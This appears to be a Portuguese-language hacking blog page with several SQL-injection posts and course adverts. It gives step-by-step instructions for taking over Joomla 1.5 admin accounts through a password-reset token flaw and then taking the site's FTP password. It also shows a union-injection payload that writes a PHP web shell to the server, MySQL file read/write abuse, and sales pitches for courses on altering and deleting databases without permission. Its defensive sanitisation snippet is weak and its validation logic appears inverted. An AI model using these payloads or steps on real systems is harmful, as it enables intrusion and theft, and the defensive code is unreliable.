sql injection joomla 1.5 website-invadir

sql injection joomla 1.5 website, invadir este framework parecia ser dificil, mas agora com esta falha divulgada. fica tudo mais facil…

Esta falha nos dar acesso ao admin do joomla

Ache um auvo que tenha a versão do joomla 1.5 para testar.

NOSSO AUVO:              www.auvo.com.br

Primeiro, temos que adicionar as variáveis via

GET: ?option=com_user&view=reset&layout=confirm
exemplo: www.auvo.com.br/?option=com_user&view=reset&layout=confirm

Abrirá uma pagina que pedirá o TOKEN(código de verificação de usuario).

Quando você entrar no link com a string ele irá pedir um Token você colocar ' ou uma aspa simples ' e vai clicar em enviar.

Veja a imagem abaixo:

 

Depois de clicar em enviar, ele vai pedir para informar a senha para altera-la,você apenas vai inserir a mesma senha nos dois campos e vai clicar em enviar:

 

 

É isso ai, galera.
Agora é só usufluir do mal feito. Entre no link http://www.auvo.com.br/administrator/ o Login é Admin e a senha a que você informou:

 

Depois clique em login.

Agora passe o Mouse sobre a aba Site e clique em configuração:

Então você irá ver 3 opções Site,Sistema,Servidor, clique na opção Servidor nesta página você vai encontrar o senha do FTP:

Agora, com o FTP. Você consegui tudo.

bY: http://www.segurancaemrede.com

 

 

Read More

como enviar arquivo-virus para um servidor com sql injection

Como enviar um arquivo virus para um servidor com sql injection – Existem varias formas de enviar um arquivo para um servidor, porem neste caso iremos utilizar a forma do sql injection.

A maioria das pessoas sabe que a injeção SQL permite que atacantes para recuperar registros do banco de dados, passe telas de login, alterar conteudo no banco de dados, porem poucas pessoas sabem que é possivel enviar um arquivo para o servidor através do banco de dados, ou seja, caso o servidor esteja vulneravel, o atacante pode injetar um codigo malicioso para enviar um arquivo shell, virus, arquivo em geral para o servidor e atravez do mesmo ter acesso root ao servidor do auvo.

Esquecendo o metodo iniciante para passar por telas de login e senha e ter acesso ao CMS ou area restrita, agora iremos para o metodo um pouco mais avançado.

Comando 1 – INTO OUTFILE – Criar arquivo e escrever no mesmo
MySQL tem um comando embutido que pode ser usado para criar e gravar arquivos de sistema. Este comando tem o seguinte formato:
mysql> select “aqui é o texto que ficará dentro do arquivo, neste caso .TXT” INTO OUTFILE “httpdocs/pasta/arquivo.txt”.
Uma grande desvantagem deste comando é que ele pode ser adicionado a uma consulta existente usando uma  SQL para UNIÃO.
Por exemplo, pode ser anexado a seguinte consulta:

select user, password from user where user=”admin” and password=’123′ union
select “text”,2 into outfile “/tmp/file.txt” — ‘

ou seja, podemos adicionar um arquivo de modo muito facil.

 

Comando 2 – LOAD_FILE – ler arquivos do servidor

MySQL tem um comando interno que pode ser usado para ler arquivos arbitrários. A sintaxe é muito simples. Vamos usar este comando para o plano B.
mysql> select load_file(“path_to_file”);

Este comando arquivo que nem precisa explicar como funciona.

 

 

WEBSHELL
WebShell é uma ferramenta muito utilizada nos dias atuais.

Podemos utilizar os comandos acima para criar uma shell, sendo que nesta shell irá executar comandos a partir do navegador web. Muito usado.

Vamos criar um WebShell muito simples que irá executar comandos shell independente do sistema operacional.
Aqui está o código de uma base muito simples em PHP.

<?php echo shell_exec($_GET['cmd']); ?>
para quem não sabe ler programação, pegue um livro já e começe a ler. O comando acima está irá executar comandos a partir de codigos passados via GET, exemplo: http://www.auvo.com.br/shell.php?cmd=ls

O exemplo acima ira listar todos os arquivos e pastas do servidor.

 

Exploit injeção de SQL – criar web shell
Você precisa adicionar a seguinte string para o comando SQL:
UNION SELECT “<?php echo shell_exec($_GET['cmd']); ?>”, 2,3,4 INTO OUTFILE “/ var / www / html / temp / c.php” -
Algumas explicações:
• 2,3,4 são apenas qualificador que costumava fazer o mesmo número de colunas, como na primeira parte da consulta seleção.
• / var / www / html é um diretório web default nas distribuições RedHat-like (Fedora, CentOS).

 

 

 

 

BY: invkloip

Read More

Como tratar sql injection

Aqui vem mais um de meus tutoriais… E hoje vamos falar sobre, como tratar sql injection, ou seja como evitar erros de sql injection permitir ataques em meu site.

Vou dar um exemplo em PHP.

1 – Uma boa forma de evitar ataques de sql injection é retirando os principais caracteres usados em ataques maliciosos.

function nosql($string){

$string      =str_replace(“‘”,”",$string);//aqui retira aspas simples <’>

$string      =str_replace(“\\”,”",$string);//aqui retira barra invertida<\\>

$string      =str_replace(“UNION”,”",$string);//aqui retiro  o comando UNION <UNION>

return $string

}

2 – Outra forma tambem bastante usada é o comando: mysql_real_escape_string

mais informações no link: http://php.net/manual/pt_BR/function.mysql-real-escape-string.php

 

3 – Você pode tambem criar funcoes anti-sqlinjection para numeros/codigos.

Um exemplo bom é quando você passa um codigo via GET['codid'] ou POST['codid'].

Ao receber esta variavel via get/post você pode validar si realmente é numero ou string.

Codigo:

if (is_numeric($_GET['codid'])==false) {
   $cod           =get_magic_quotes_gpc() ? stripslashes($_GET['codid']) : $_GET['codid'];
   $cod = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($cod) : mysql_escape_string($cod);
$cod           =(int)$cod;

}else{

print 'error';
header("location:error.php");
exit; }

 

 

seguranca em redes .com

Read More

Apostila com Técnicas de invasao com sql injection

Criei uma apostila com uma serie de tecnicas para excução do famoso sql injection.

Abaixo está alguns dos assuntos abordados na apostila.

COMO COMPRAR ?

Para conseguir esta apostila Basta fazer um deposito pelo pagseguro na conta do juancarloscunha606@hotmail.com, que logo após enviarei usuario e senha da area restrita para fazer download da apostila.

COMO VOU APRENDER ?

Eu auxiliarei a todos no estudo, e disponibilizarei auvos vulneraveis a ataques.

 

ASSUNTOS SOBRE O APOSTILA.

Mysql básico

Criando uma query

Principio do sqlinjection

O que é sqlinjection

Teoria de sqlinjection

Regras sqlinjection

Criando um sistema de login E senha para testes

Listar dados do banco de dados com sqlinjection

Burlar uma query

Burlar um sistema de login e senha

Conseguir acesso ao banco de dados

Conseguir privilégios em um sistema

Conseguir dados de um sistema

Usando parâmetro UNION

Inserindo dados no banco de dados sem permissão

Alterando dados do banco de dados sem permissão

Excluindo dados do banco de dados sem permissão

Excluindo tabelas do banco de dados sem permissão

Excluindo database sem permissão

Descobrir nomes de tabelas do banco de dados

Descobrir nome das colunas do banco de dados

Protegendo sistema de login e senha

Protegendo dados do banco

Proteção na query

Emunizando site, sistema… do sqlinjection

 

Para você aprender com precisão este curso você precisa de saber:

Básico em linguagem de programação

Básico em banco de dados

Read More

Descobrindo nomes de tabelas em banco de dados mysql,sqlinjection

Uma das formas mais fáceis de si descobrir nomes de tabelas é o uso do comando, show:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Agora, vou tentar listar do banco de dados werp, O nome da tabela de usuarios, Geralmente os nomes das tabelas são: users, roots,usuarios…Vamos ver qual o nome:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Agora, eu já sei o nome do banco de dados, e também sei o nome das tabelas que tem no database, inclusive a de usuarios, agora, eu quero saber o nome das colunas da tabela usuarios.

 

 

 

 

 

 

 

 

 

 

 

 

Agora, vou listar o nome do usuário administrador e a senha do usuário:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Conclusão:

 

Aqui, você aprendeu listar todos databases do banco de dados, Listar todas as tabelas do database, Listar todas as colunas das tabelas,  Listar dados das colunas.

Existem varias maneiras de fazer isso. Eu só estou ensinando uma das maneiras aqui.

Read More

curso sqlinjection, apostila sqlinjection, compre agora, Dou garantia, Si não aprender dou seu dinheiro de volta

&

 

nbsp;

Dentre os assuntos que são ensinados aqui, são:

Mysql básico

Criando uma query

Principio do sqlinjection

O que é sqlinjection

Teoria de sqlinjection

Regras sqlinjection

Criando um sistema de login E senha para testes

Listar dados do banco de dados com sqlinjection

Burlar uma query

Burlar um sistema de login e senha

Conseguir acesso ao banco de dados

Conseguir privilégios em um sistema

Conseguir dados de um sistema

Usando parâmetro UNION

Inserindo dados no banco de dados sem permissão

Alterando dados do banco de dados sem permissão

Excluindo dados do banco de dados sem permissão

Excluindo tabelas do banco de dados sem permissão

Excluindo database sem permissão

Descobrir nomes de tabelas do banco de dados

Descobrir nome das colunas do banco de dados

Protegendo sistema de login e senha

Protegendo dados do banco

Proteção na query

Emunizando site, sistema… do sqlinjection

Para você aprender com precisão este curso você precisa de saber:

Básico em linguagem de programação

Básico em banco de dados

——————————————————————————–

Quem si interessar por este livro, pode entrar no link para saber sobre os preços:

http://www.segurancaemrede.com/livros-sobre-invasao/

Ou pode enviar um email para juancarloscunha606@hotmail.com para saber sobre nossos preços.

 

 

 

Read More